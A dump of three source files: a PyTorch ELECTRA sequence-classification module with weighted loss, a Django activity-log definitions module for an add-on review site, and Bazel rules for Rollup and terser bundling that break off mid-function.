ext | sha | content
---|---|---
py | b414b24676f4c00d194a5bcf57c51b04d1cd7c87 | import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.models.electra.modeling_electra import (
ElectraModel,
ElectraPreTrainedModel,
ElectraClassificationHead,
)
class ElectraForSequenceClassification(ElectraPreTrainedModel):
r"""
**labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``:
Labels for computing the sequence classification/regression loss.
Indices should be in ``[0, ..., config.num_labels - 1]``.
If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss),
If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy).
Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
**loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
Classification (or regression if config.num_labels==1) loss.
**logits**: ``torch.FloatTensor`` of shape ``(batch_size, config.num_labels)``
Classification (or regression if config.num_labels==1) scores (before SoftMax).
**hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
of shape ``(batch_size, sequence_length, hidden_size)``:
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
**attentions**: (`optional`, returned when ``config.output_attentions=True``)
list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
Attention weights after the attention softmax, used to compute the weighted average in the self-attention heads.
Examples::
tokenizer = ElectraTokenizer.from_pretrained('google/electra-base-discriminator')
model = ElectraForSequenceClassification.from_pretrained('google/electra-base-discriminator')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute")).unsqueeze(0) # Batch size 1
labels = torch.tensor([1]).unsqueeze(0) # Batch size 1
outputs = model(input_ids, labels=labels)
loss, logits = outputs[:2]
""" # noqa: ignore flake8"
def __init__(self, config, weight=None):
super(ElectraForSequenceClassification, self).__init__(config)
self.num_labels = config.num_labels
self.weight = weight  # optional per-class weights used by the loss in forward()
self.electra = ElectraModel(config)
self.classifier = ElectraClassificationHead(config)
self.init_weights()
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
):
discriminator_hidden_states = self.electra(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
inputs_embeds,
)
sequence_output = discriminator_hidden_states[0]
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
if self.weight is not None:
weight = self.weight.to(labels.device)
else:
weight = None
loss_fct = CrossEntropyLoss(weight=weight)
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
output = (logits,) + discriminator_hidden_states[1:]
return ((loss,) + output) if loss is not None else output
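if __name__ == "__main__":
    # Illustrative smoke test (an addition for clarity, not part of the original
    # module). It assumes only that torch and transformers are installed: a tiny
    # randomly initialised config avoids any checkpoint download, and the example
    # shows how `weight` feeds the weighted CrossEntropyLoss in forward().
    from transformers import ElectraConfig

    config = ElectraConfig(
        vocab_size=100,
        embedding_size=32,
        hidden_size=32,
        num_hidden_layers=1,
        num_attention_heads=2,
        intermediate_size=64,
        num_labels=2,
    )
    model = ElectraForSequenceClassification(config, weight=torch.tensor([1.0, 2.0]))
    input_ids = torch.randint(0, config.vocab_size, (4, 16))
    labels = torch.tensor([0, 1, 0, 1])
    loss, logits = model(input_ids, labels=labels)[:2]
    print(loss.item(), logits.shape)  # scalar loss, logits of shape (4, 2)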
|
py | b414b29e78ff17833fcd7389133addc8211cca9c | # The absolute import feature is required so that we get the root celery
# module rather than `amo.celery`.
from __future__ import absolute_import
from collections import namedtuple
from inspect import isclass
from django.utils.translation import gettext_lazy as _
__all__ = (
'LOG',
'LOG_BY_ID',
'LOG_KEEP',
)
class _LOG(object):
action_class = None
class CREATE_ADDON(_LOG):
id = 1
action_class = 'add'
format = _('{addon} was created.')
keep = True
class EDIT_PROPERTIES(_LOG):
""" Expects: addon """
id = 2
action_class = 'edit'
format = _('{addon} properties edited.')
class EDIT_DESCRIPTIONS(_LOG):
id = 3
action_class = 'edit'
format = _('{addon} description edited.')
class EDIT_CATEGORIES(_LOG):
id = 4
action_class = 'edit'
format = _('Categories edited for {addon}.')
class ADD_USER_WITH_ROLE(_LOG):
id = 5
action_class = 'add'
format = _('{0.name} ({1}) added to {addon}.')
keep = True
class REMOVE_USER_WITH_ROLE(_LOG):
id = 6
action_class = 'delete'
# L10n: {0} is the user being removed, {1} is their role.
format = _('{0.name} ({1}) removed from {addon}.')
keep = True
class EDIT_CONTRIBUTIONS(_LOG):
id = 7
action_class = 'edit'
format = _('Contributions for {addon}.')
class USER_DISABLE(_LOG):
id = 8
format = _('{addon} disabled.')
keep = True
class USER_ENABLE(_LOG):
id = 9
format = _('{addon} enabled.')
keep = True
class CHANGE_STATUS(_LOG):
id = 12
# L10n: {status} is the status
format = _('{addon} status changed to {status}.')
keep = True
class ADD_VERSION(_LOG):
id = 16
action_class = 'add'
format = _('{version} added to {addon}.')
keep = True
store_ip = True
class EDIT_VERSION(_LOG):
id = 17
action_class = 'edit'
format = _('{version} edited for {addon}.')
class DELETE_VERSION(_LOG):
id = 18
action_class = 'delete'
# Note, {0} is a string not a version since the version is deleted.
# L10n: {0} is the version number
format = _('Version {0} deleted from {addon}.')
keep = True
class ADD_FILE_TO_VERSION(_LOG):
id = 19
action_class = 'add'
format = _('File {0.name} added to {version} of {addon}.')
class DELETE_FILE_FROM_VERSION(_LOG):
"""
Expecting: addon, filename, version
Because the file is being deleted, filename and version
should be strings and not the object.
"""
id = 20
action_class = 'delete'
format = _('File {0} deleted from {version} of {addon}.')
class APPROVE_VERSION(_LOG):
id = 21
action_class = 'approve'
format = _('{addon} {version} approved.')
short = _('Approved')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class PRELIMINARY_VERSION(_LOG):
id = 42
action_class = 'approve'
format = _('{addon} {version} given preliminary review.')
short = _('Preliminarily approved')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class REJECT_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 43
action_class = 'reject'
format = _('{addon} {version} rejected.')
short = _('Rejected')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class RETAIN_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 22
format = _('{addon} {version} retained.')
short = _('Retained')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class ESCALATE_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 23
format = _('{addon} {version} escalated.')
short = _('Super review requested')
keep = True
review_email_user = True
review_queue = True
hide_developer = True
class REQUEST_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 24
format = _('{addon} {version} review requested.')
short = _('Review requested')
keep = True
review_email_user = True
review_queue = True
# Obsolete now that we have pending rejections, kept for compatibility.
class REQUEST_INFORMATION(_LOG):
id = 44
format = _('{addon} {version} more information requested.')
short = _('More information requested')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
# Obsolete now that we've split the requests for admin review into separate
# actions for code/theme/content, but kept for compatibility with old history,
# and also to re-use the `sanitize` property.
class REQUEST_SUPER_REVIEW(_LOG):
id = 45
format = _('{addon} {version} super review requested.')
short = _('Super review requested')
keep = True
review_queue = True
sanitize = _(
"The addon has been flagged for Admin Review. It's still "
'in our review queue, but it will need to be checked by one '
'of our admin reviewers. The review might take longer than '
'usual.'
)
reviewer_review_action = True
class COMMENT_VERSION(_LOG):
id = 49
format = _('Comment on {addon} {version}.')
short = _('Commented')
keep = True
review_queue = True
hide_developer = True
reviewer_review_action = True
class ADD_TAG(_LOG):
id = 25
action_class = 'tag'
format = _('{tag} added to {addon}.')
class REMOVE_TAG(_LOG):
id = 26
action_class = 'tag'
format = _('{tag} removed from {addon}.')
class ADD_TO_COLLECTION(_LOG):
id = 27
action_class = 'collection'
format = _('{addon} added to {collection}.')
class REMOVE_FROM_COLLECTION(_LOG):
id = 28
action_class = 'collection'
format = _('{addon} removed from {collection}.')
class ADD_RATING(_LOG):
id = 29
action_class = 'review'
format = _('{rating} for {addon} written.')
# TODO(davedash): Add these when we do the admin site
class ADD_RECOMMENDED_CATEGORY(_LOG):
id = 31
action_class = 'edit'
# L10n: {0} is a category name.
format = _('{addon} featured in {0}.')
class REMOVE_RECOMMENDED_CATEGORY(_LOG):
id = 32
action_class = 'edit'
# L10n: {0} is a category name.
format = _('{addon} no longer featured in {0}.')
class ADD_RECOMMENDED(_LOG):
id = 33
format = _('{addon} is now featured.')
keep = True
class REMOVE_RECOMMENDED(_LOG):
id = 34
format = _('{addon} is no longer featured.')
keep = True
class ADD_APPVERSION(_LOG):
id = 35
action_class = 'add'
# L10n: {0} is the application, {1} is the version of the app
format = _('{0} {1} added.')
class CHANGE_USER_WITH_ROLE(_LOG):
""" Expects: author.user, role, addon """
id = 36
# L10n: {0} is a user, {1} is their role
format = _('{0.name} role changed to {1} for {addon}.')
keep = True
class CHANGE_LICENSE(_LOG):
""" Expects: license, addon """
id = 37
action_class = 'edit'
format = _('{addon} is now licensed under {0}.')
class CHANGE_POLICY(_LOG):
id = 38
action_class = 'edit'
format = _('{addon} policy changed.')
class CHANGE_ICON(_LOG):
id = 39
action_class = 'edit'
format = _('{addon} icon changed.')
class APPROVE_RATING(_LOG):
id = 40
action_class = 'approve'
format = _('{rating} for {addon} approved.')
reviewer_format = _('{user} approved {rating} for {addon}.')
keep = True
reviewer_event = True
class DELETE_RATING(_LOG):
"""Requires rating.id and add-on objects."""
id = 41
action_class = 'review'
format = _('Review {rating} for {addon} deleted.')
reviewer_format = _('{user} deleted {rating} for {addon}.')
keep = True
reviewer_event = True
class MAX_APPVERSION_UPDATED(_LOG):
id = 46
format = _('Application max version for {version} updated.')
class BULK_VALIDATION_EMAILED(_LOG):
id = 47
format = _('Authors emailed about compatibility of {version}.')
class BULK_VALIDATION_USER_EMAILED(_LOG):
id = 130
format = _('Email sent to Author about add-on compatibility.')
class CHANGE_PASSWORD(_LOG):
id = 48
format = _('Password changed.')
class APPROVE_VERSION_WAITING(_LOG):
id = 53
action_class = 'approve'
format = _('{addon} {version} approved but waiting to be made public.')
short = _('Approved but waiting')
keep = True
review_email_user = True
review_queue = True
class USER_EDITED(_LOG):
id = 60
format = _('Account updated.')
class CUSTOM_TEXT(_LOG):
id = 98
format = '{0}'
class CUSTOM_HTML(_LOG):
id = 99
format = '{0}'
class OBJECT_ADDED(_LOG):
id = 100
format = _('Created: {0}.')
admin_event = True
class OBJECT_EDITED(_LOG):
id = 101
format = _('Edited field: {2} set to: {0}.')
admin_event = True
class OBJECT_DELETED(_LOG):
id = 102
format = _('Deleted: {1}.')
admin_event = True
class ADMIN_USER_EDITED(_LOG):
id = 103
format = _('User {user} edited, reason: {1}')
admin_event = True
class ADMIN_USER_ANONYMIZED(_LOG):
id = 104
format = _('User {user} anonymized.')
keep = True
admin_event = True
class ADMIN_USER_RESTRICTED(_LOG):
id = 105
format = _('User {user} restricted.')
keep = True
admin_event = True
class ADMIN_VIEWED_LOG(_LOG):
id = 106
format = _('Admin {0} viewed activity log for {user}.')
admin_event = True
class EDIT_RATING(_LOG):
id = 107
action_class = 'review'
format = _('{rating} for {addon} updated.')
class THEME_REVIEW(_LOG):
id = 108
action_class = 'review'
format = _('{addon} reviewed.')
keep = True
class ADMIN_USER_BANNED(_LOG):
id = 109
format = _('User {user} banned.')
keep = True
admin_event = True
class ADMIN_USER_PICTURE_DELETED(_LOG):
id = 110
format = _('User {user} picture deleted.')
admin_event = True
class GROUP_USER_ADDED(_LOG):
id = 120
action_class = 'access'
format = _('User {0.name} added to {group}.')
keep = True
admin_event = True
class GROUP_USER_REMOVED(_LOG):
id = 121
action_class = 'access'
format = _('User {0.name} removed from {group}.')
keep = True
admin_event = True
class ADDON_UNLISTED(_LOG):
id = 128
format = _('{addon} unlisted.')
keep = True
class BETA_SIGNED(_LOG):
id = 131
format = _('{file} was signed.')
keep = True
# Obsolete, we don't care about validation results on beta files.
class BETA_SIGNED_VALIDATION_FAILED(_LOG):
id = 132
format = _('{file} was signed.')
keep = True
class DELETE_ADDON(_LOG):
id = 133
action_class = 'delete'
# L10n: {0} is the add-on id, {1} is the add-on GUID.
format = _('Addon id {0} with GUID {1} has been deleted')
keep = True
class EXPERIMENT_SIGNED(_LOG):
id = 134
format = _('{file} was signed.')
keep = True
class UNLISTED_SIGNED(_LOG):
id = 135
format = _('{file} was signed.')
keep = True
# Obsolete, we don't care about validation results on unlisted files anymore.
class UNLISTED_SIGNED_VALIDATION_FAILED(_LOG):
id = 136
format = _('{file} was signed.')
keep = True
# Obsolete, we don't care about validation results on unlisted files anymore,
# and the distinction for sideloading add-ons is gone as well.
class UNLISTED_SIDELOAD_SIGNED_VALIDATION_PASSED(_LOG):
id = 137
format = _('{file} was signed.')
keep = True
# Obsolete, we don't care about validation results on unlisted files anymore,
# and the distinction for sideloading add-ons is gone as well.
class UNLISTED_SIDELOAD_SIGNED_VALIDATION_FAILED(_LOG):
id = 138
format = _('{file} was signed.')
keep = True
class PRELIMINARY_ADDON_MIGRATED(_LOG):
id = 139
format = _('{addon} migrated from preliminary.')
keep = True
review_queue = True
class DEVELOPER_REPLY_VERSION(_LOG):
id = 140
format = _('Reply by developer on {addon} {version}.')
short = _('Developer Reply')
keep = True
review_queue = True
class REVIEWER_REPLY_VERSION(_LOG):
id = 141
format = _('Reply by reviewer on {addon} {version}.')
short = _('Reviewer Reply')
keep = True
review_queue = True
class APPROVAL_NOTES_CHANGED(_LOG):
id = 142
format = _('Approval notes changed for {addon} {version}.')
short = _('Approval notes changed')
keep = True
review_queue = True
class SOURCE_CODE_UPLOADED(_LOG):
id = 143
format = _('Source code uploaded for {addon} {version}.')
short = _('Source code uploaded')
keep = True
review_queue = True
class CONFIRM_AUTO_APPROVED(_LOG):
id = 144
format = _('Auto-Approval confirmed for {addon} {version}.')
short = _('Auto-Approval confirmed')
keep = True
reviewer_review_action = True
review_queue = True
hide_developer = True
class ENABLE_VERSION(_LOG):
id = 145
format = _('{addon} {version} re-enabled.')
class DISABLE_VERSION(_LOG):
id = 146
format = _('{addon} {version} disabled.')
class APPROVE_CONTENT(_LOG):
id = 147
format = _('{addon} {version} content approved.')
short = _('Content approved')
keep = True
reviewer_review_action = True
review_queue = True
hide_developer = True
class REJECT_CONTENT(_LOG):
id = 148
action_class = 'reject'
format = _('{addon} {version} content rejected.')
short = _('Content rejected')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class ADMIN_ALTER_INFO_REQUEST(_LOG):
id = 149
format = _('{addon} information request altered or removed by admin.')
short = _('Information request altered')
keep = True
reviewer_review_action = True
review_queue = True
class DEVELOPER_CLEAR_INFO_REQUEST(_LOG):
id = 150
format = _('Information request cleared by developer on {addon} {version}.')
short = _('Information request removed')
keep = True
review_queue = True
class REQUEST_ADMIN_REVIEW_CODE(_LOG):
id = 151
format = _('{addon} {version} admin add-on-review requested.')
short = _('Admin add-on-review requested')
keep = True
review_queue = True
reviewer_review_action = True
sanitize = REQUEST_SUPER_REVIEW.sanitize
class REQUEST_ADMIN_REVIEW_CONTENT(_LOG):
id = 152
format = _('{addon} {version} admin content-review requested.')
short = _('Admin content-review requested')
keep = True
review_queue = True
reviewer_review_action = True
sanitize = REQUEST_SUPER_REVIEW.sanitize
class REQUEST_ADMIN_REVIEW_THEME(_LOG):
id = 153
format = _('{addon} {version} admin theme-review requested.')
short = _('Admin theme-review requested')
keep = True
review_queue = True
reviewer_review_action = True
sanitize = REQUEST_SUPER_REVIEW.sanitize
class CREATE_STATICTHEME_FROM_PERSONA(_LOG):
id = 154
action_class = 'add'
format = _('{addon} was migrated from a lightweight theme.')
keep = True
class ADMIN_API_KEY_RESET(_LOG):
id = 155
format = _('User {user} api key reset.')
admin_event = True
class BLOCKLIST_BLOCK_ADDED(_LOG):
id = 156
keep = True
action_class = 'add'
hide_developer = True
format = _('Block for {0} added to Blocklist.')
short = _('Block added')
class BLOCKLIST_BLOCK_EDITED(_LOG):
id = 157
keep = True
action_class = 'edit'
hide_developer = True
format = _('Block for {0} edited in Blocklist.')
short = _('Block edited')
class BLOCKLIST_BLOCK_DELETED(_LOG):
id = 158
keep = True
action_class = 'delete'
hide_developer = True
format = _('Block for {0} deleted from Blocklist.')
short = _('Block deleted')
class DENIED_GUID_ADDED(_LOG):
id = 159
keep = True
action_class = 'add'
hide_developer = True
format = _('GUID for {addon} added to DeniedGuid.')
class DENIED_GUID_DELETED(_LOG):
id = 160
keep = True
action_class = 'delete'
hide_developer = True
format = _('GUID for {addon} removed from DeniedGuid.')
class BLOCKLIST_SIGNOFF(_LOG):
id = 161
keep = True
hide_developer = True
format = _('Block {1} action for {0} signed off.')
short = _('Block action signoff')
class ADMIN_USER_SESSION_RESET(_LOG):
id = 162
format = _('User {user} session(s) reset.')
admin_event = True
class THROTTLED(_LOG):
id = 163
format = _('User {user} throttled for scope "{0}"')
admin_event = True
class REJECT_CONTENT_DELAYED(_LOG):
id = 164
action_class = 'reject'
format = _('{addon} {version} content reject scheduled.')
short = _('Content reject scheduled')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class REJECT_VERSION_DELAYED(_LOG):
# takes add-on, version, reviewtype
id = 165
action_class = 'reject'
format = _('{addon} {version} reject scheduled.')
short = _('Rejection scheduled')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class VERSION_RESIGNED(_LOG):
# takes add-on, version, VersionString
id = 166
format = _('{addon} {version} re-signed (previously {0}).')
short = _('Version re-signed')
review_queue = True
class FORCE_DISABLE(_LOG):
id = 167
keep = True
# We don't want to notify developers, this is not a regular rejection - the
# add-on is likely malicious.
hide_developer = True
reviewer_review_action = True
format = _('{user} force-disabled {addon}.')
short = _('Force disabled')
class FORCE_ENABLE(_LOG):
id = 168
keep = True
hide_developer = True
reviewer_review_action = True
format = _('{user} force-enabled {addon}.')
short = _('Force enabled')
LOGS = [x for x in vars().values() if isclass(x) and issubclass(x, _LOG) and x != _LOG]
# Make sure there are no duplicate IDs.
assert len(LOGS) == len(set(log.id for log in LOGS))
LOG_BY_ID = dict((log.id, log) for log in LOGS)
LOG = namedtuple('LogTuple', [log.__name__ for log in LOGS])(*[log for log in LOGS])
LOG_ADMINS = [log.id for log in LOGS if hasattr(log, 'admin_event')]
LOG_KEEP = [log.id for log in LOGS if hasattr(log, 'keep')]
LOG_RATING_MODERATION = [log.id for log in LOGS if hasattr(log, 'reviewer_event')]
LOG_REVIEW_QUEUE = [log.id for log in LOGS if hasattr(log, 'review_queue')]
LOG_REVIEWER_REVIEW_ACTION = [
log.id for log in LOGS if hasattr(log, 'reviewer_review_action')
]
# Is the user emailed the message?
LOG_REVIEW_EMAIL_USER = [log.id for log in LOGS if hasattr(log, 'review_email_user')]
# Logs *not* to show to the developer.
LOG_HIDE_DEVELOPER = [
log.id
for log in LOGS
if (getattr(log, 'hide_developer', False) or log.id in LOG_ADMINS)
]
# Review Queue logs to show to developer (i.e. hiding admin/private)
LOG_REVIEW_QUEUE_DEVELOPER = list(set(LOG_REVIEW_QUEUE) - set(LOG_HIDE_DEVELOPER))
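# Illustrative lookups (an addition for clarity, not part of the original module):
# the namedtuple above gives attribute access by action name, LOG_BY_ID maps the
# stable integer ids back to their classes, and the LOG_* lists group ids by flag.
if __name__ == '__main__':
    assert LOG.CREATE_ADDON is LOG_BY_ID[1] is CREATE_ADDON
    assert CREATE_ADDON.id in LOG_KEEP  # keep = True above
    assert APPROVE_VERSION.id in LOG_REVIEW_QUEUE  # review_queue = True above
    assert OBJECT_ADDED.id in LOG_ADMINS  # admin_event = True above
    assert OBJECT_ADDED.id in LOG_HIDE_DEVELOPER  # admin ids are hidden from developers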
|
bzl | b414b2ea18673aa85196c1f19434eb7b038fb1b6 | # Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rollup bundling
The versions of Rollup and terser are controlled by the Bazel toolchain.
You do not need to install them into your project.
"""
load("@build_bazel_rules_nodejs//internal/common:node_module_info.bzl", "NodeModuleSources", "collect_node_modules_aspect")
load("//internal/common:collect_es6_sources.bzl", _collect_es2015_sources = "collect_es6_sources")
load("//internal/common:expand_into_runfiles.bzl", "expand_path_into_runfiles")
load("//internal/common:module_mappings.bzl", "get_module_mappings")
_ROLLUP_MODULE_MAPPINGS_ATTR = "rollup_module_mappings"
def _rollup_module_mappings_aspect_impl(target, ctx):
mappings = get_module_mappings(target.label, ctx.rule.attr)
return struct(rollup_module_mappings = mappings)
rollup_module_mappings_aspect = aspect(
_rollup_module_mappings_aspect_impl,
attr_aspects = ["deps"],
)
def _trim_package_node_modules(package_name):
# trim a package name down to its path prior to a node_modules
# segment. 'foo/node_modules/bar' would become 'foo' and
# 'node_modules/bar' would become ''
segments = []
for n in package_name.split("/"):
if n == "node_modules":
break
segments += [n]
return "/".join(segments)
# This function is similar but slightly different than _compute_node_modules_root
# in /internal/node/node.bzl. TODO(gregmagolan): consolidate these functions
def _compute_node_modules_root(ctx):
"""Computes the node_modules root from the node_modules and deps attributes.
Args:
ctx: the skylark execution context
Returns:
The node_modules root as a string
"""
node_modules_root = None
if ctx.attr.node_modules:
if NodeModuleSources in ctx.attr.node_modules:
node_modules_root = "/".join(["external", ctx.attr.node_modules[NodeModuleSources].workspace, "node_modules"])
elif ctx.files.node_modules:
# ctx.files.node_modules is not an empty list
node_modules_root = "/".join([f for f in [
ctx.attr.node_modules.label.workspace_root,
_trim_package_node_modules(ctx.attr.node_modules.label.package),
"node_modules",
] if f])
for d in ctx.attr.deps:
if NodeModuleSources in d:
possible_root = "/".join(["external", d[NodeModuleSources].workspace, "node_modules"])
if not node_modules_root:
node_modules_root = possible_root
elif node_modules_root != possible_root:
fail("All npm dependencies need to come from a single workspace. Found '%s' and '%s'." % (node_modules_root, possible_root))
if not node_modules_root:
# there are no fine grained deps and the node_modules attribute is an empty filegroup
# but we still need a node_modules_root even if it's empty
node_modules_root = "/".join([f for f in [
ctx.attr.node_modules.label.workspace_root,
ctx.attr.node_modules.label.package,
"node_modules",
] if f])
return node_modules_root
# Expand entry_point into runfiles and strip the file extension
def _entry_point_path(ctx):
return "/".join([
expand_path_into_runfiles(ctx, ctx.file.entry_point.dirname),
ctx.file.entry_point.basename,
])[:-(len(ctx.file.entry_point.extension) + 1)]
def write_rollup_config(ctx, plugins = [], root_dir = None, filename = "_%s.rollup.conf.js", output_format = "iife", additional_entry_points = []):
"""Generate a rollup config file.
This is also used by the ng_rollup_bundle and ng_package rules in @angular/bazel.
Args:
ctx: Bazel rule execution context
plugins: extra plugins (defaults to [])
See the ng_rollup_bundle in @angular/bazel for example of usage.
root_dir: root directory for module resolution (defaults to None)
filename: output filename pattern (defaults to `_%s.rollup.conf.js`)
output_format: passed to rollup output.format option, e.g. "umd"
additional_entry_points: additional entry points for code splitting
Returns:
The rollup config file. See https://rollupjs.org/guide/en#configuration-files
"""
config = ctx.actions.declare_file(filename % ctx.label.name)
# build_file_path includes the BUILD.bazel file, transform here to only include the dirname
build_file_dirname = "/".join(ctx.build_file_path.split("/")[:-1])
entry_points = [_entry_point_path(ctx)] + additional_entry_points
mappings = dict()
all_deps = ctx.attr.deps + ctx.attr.srcs
for dep in all_deps:
if hasattr(dep, _ROLLUP_MODULE_MAPPINGS_ATTR):
for k, v in getattr(dep, _ROLLUP_MODULE_MAPPINGS_ATTR).items():
if k in mappings and mappings[k] != v:
fail(("duplicate module mapping at %s: %s maps to both %s and %s" %
(dep.label, k, mappings[k], v)), "deps")
mappings[k] = v
if not root_dir:
# This must be .es6 to match collect_es6_sources.bzl
root_dir = "/".join([ctx.bin_dir.path, build_file_dirname, ctx.label.name + ".es6"])
node_modules_root = _compute_node_modules_root(ctx)
is_default_node_modules = False
if node_modules_root == "node_modules" and ctx.attr.node_modules.label.package == "" and ctx.attr.node_modules.label.name == "node_modules_none":
is_default_node_modules = True
ctx.actions.expand_template(
output = config,
template = ctx.file._rollup_config_tmpl,
substitutions = {
"TMPL_additional_plugins": ",\n".join(plugins),
"TMPL_banner_file": "\"%s\"" % ctx.file.license_banner.path if ctx.file.license_banner else "undefined",
"TMPL_global_name": ctx.attr.global_name if ctx.attr.global_name else ctx.label.name,
"TMPL_inputs": ",".join(["\"%s\"" % e for e in entry_points]),
"TMPL_is_default_node_modules": "true" if is_default_node_modules else "false",
"TMPL_module_mappings": str(mappings),
"TMPL_node_modules_root": node_modules_root,
"TMPL_output_format": output_format,
"TMPL_rootDir": root_dir,
"TMPL_stamp_data": "\"%s\"" % ctx.version_file.path if ctx.version_file else "undefined",
"TMPL_target": str(ctx.label),
"TMPL_workspace_name": ctx.workspace_name,
},
)
return config
def run_rollup(ctx, sources, config, output):
"""Creates an Action that can run rollup on set of sources.
This is also used by ng_package and ng_rollup_bundle rules in @angular/bazel.
Args:
ctx: Bazel rule execution context
sources: JS sources to rollup
config: rollup config file
output: output file
Returns:
the sourcemap output file
"""
map_output = ctx.actions.declare_file(output.basename + ".map", sibling = output)
_run_rollup(ctx, sources, config, output, map_output)
return map_output
def _filter_js_inputs(all_inputs):
# Note: make sure that "all_inputs" is not a depset.
# Iterating over a depset is deprecated!
return [
f
for f in all_inputs
# We also need to include ".map" files as these can be read by
# the "rollup-plugin-sourcemaps" plugin.
if f.path.endswith(".js") or f.path.endswith(".json") or f.path.endswith(".map")
]
def _run_rollup(ctx, sources, config, output, map_output = None):
args = ctx.actions.args()
args.add_all(["--config", config.path])
if map_output:
args.add_all(["--output.file", output.path])
args.add_all(["--output.sourcemap", "--output.sourcemapFile", map_output.path])
else:
args.add_all(["--output.dir", output.path])
args.add_all(["--output.sourcemap"])
# We will produce errors as needed. Anything else is spammy: a well-behaved
# bazel rule prints nothing on success.
args.add("--silent")
if ctx.attr.globals:
args.add("--external")
args.add_joined(ctx.attr.globals.keys(), join_with = ",")
args.add("--globals")
args.add_joined(["%s:%s" % g for g in ctx.attr.globals.items()], join_with = ",")
direct_inputs = [config]
direct_inputs += _filter_js_inputs(ctx.files.node_modules)
# Also include files from npm fine grained deps as inputs.
# These deps are identified by the NodeModuleSources provider.
for d in ctx.attr.deps:
if NodeModuleSources in d:
# Note: we can't avoid calling .to_list() on sources
direct_inputs += _filter_js_inputs(d[NodeModuleSources].sources.to_list())
if ctx.file.license_banner:
direct_inputs += [ctx.file.license_banner]
if ctx.version_file:
direct_inputs += [ctx.version_file]
outputs = [output]
if map_output:
outputs += [map_output]
ctx.actions.run(
progress_message = "Bundling JavaScript %s [rollup]" % output.short_path,
executable = ctx.executable._rollup,
inputs = depset(direct_inputs, transitive = [sources]),
outputs = outputs,
arguments = [args],
)
def _run_tsc(ctx, input, output):
args = ctx.actions.args()
# No types needed since we are just downleveling.
# `--types` followed by another config argument means an empty types array
# for the command line parser.
# See https://github.com/Microsoft/TypeScript/issues/18581#issuecomment-330700612
args.add("--types")
args.add("--skipLibCheck")
args.add_all(["--target", "es5"])
args.add_all(["--lib", "es2015,dom"])
args.add("--allowJS")
args.add(input.path)
args.add_all(["--outFile", output.path])
ctx.actions.run(
progress_message = "Downleveling JavaScript to ES5 %s [typescript]" % output.short_path,
executable = ctx.executable._tsc,
inputs = [input],
outputs = [output],
arguments = [args],
)
def _run_tsc_on_directory(ctx, input_dir, output_dir):
config = ctx.actions.declare_file("_%s.code-split.tsconfig.json" % ctx.label.name)
args = ctx.actions.args()
args.add_all(["--project", config.path])
args.add_all(["--input", input_dir.path])
args.add_all(["--output", output_dir.path])
ctx.actions.run(
progress_message = "Downleveling JavaScript to ES5 %s [typescript]" % output_dir.short_path,
executable = ctx.executable._tsc_directory,
inputs = [input_dir],
outputs = [output_dir, config],
arguments = [args],
)
def run_uglify(**kwargs):
print("WARNING: run_uglify has been renamed to run_terser. Please update callsites")
run_terser(**kwargs)
def run_terser(ctx, input, output, debug = False, comments = True, config_name = None, in_source_map = None):
"""Runs terser on an input file.
This is also used by https://github.com/angular/angular.
Args:
ctx: Bazel rule execution context
input: input file
output: output file
debug: if True then output is beautified (defaults to False)
comments: if True then copyright comments are preserved in output file (defaults to True)
config_name: allows callers to control the name of the generated terser configuration,
which will be `_[config_name].terser.json` in the package where the target is declared
in_source_map: sourcemap file for the input file, passed to the "--source-map content="
option of terser.
Returns:
The sourcemap file
"""
map_output = ctx.actions.declare_file(output.basename + ".map", sibling = output)
_run_terser(ctx, input, output, map_output, debug, comments, config_name, in_source_map)
return map_output
def _run_terser(ctx, input, output, map_output, debug = False, comments = True, config_name = None, in_source_map = None):
inputs = [input]
outputs = [output]
args = ctx.actions.args()
if map_output:
# Running terser on an individual file
if not config_name:
config_name = ctx.label.name
if debug:
config_name += ".debug"
config = ctx.actions.declare_file("_%s.terser.json" % config_name)
args.add_all(["--config-file", config.path])
outputs += [map_output, config]
args.add(input.path)
args.add_all(["--output", output.path])
# Source mapping options are comma-packed into one argv
# see https://github.com/terser-js/terser#command-line-usage
source_map_opts = ["includeSources", "base=" + ctx.bin_dir.path]
if in_source_map:
source_map_opts.append("content=" + in_source_map.path)
inputs.append(in_source_map)
# This option doesn't work in the config file, only on the CLI
args.add_all(["--source-map", ",".join(source_map_opts)])
if comments:
args.add("--comments")
if debug:
args.add("--debug")
args.add("--beautify")
ctx.actions.run(
progress_message = "Optimizing JavaScript %s [terser]" % output.short_path,
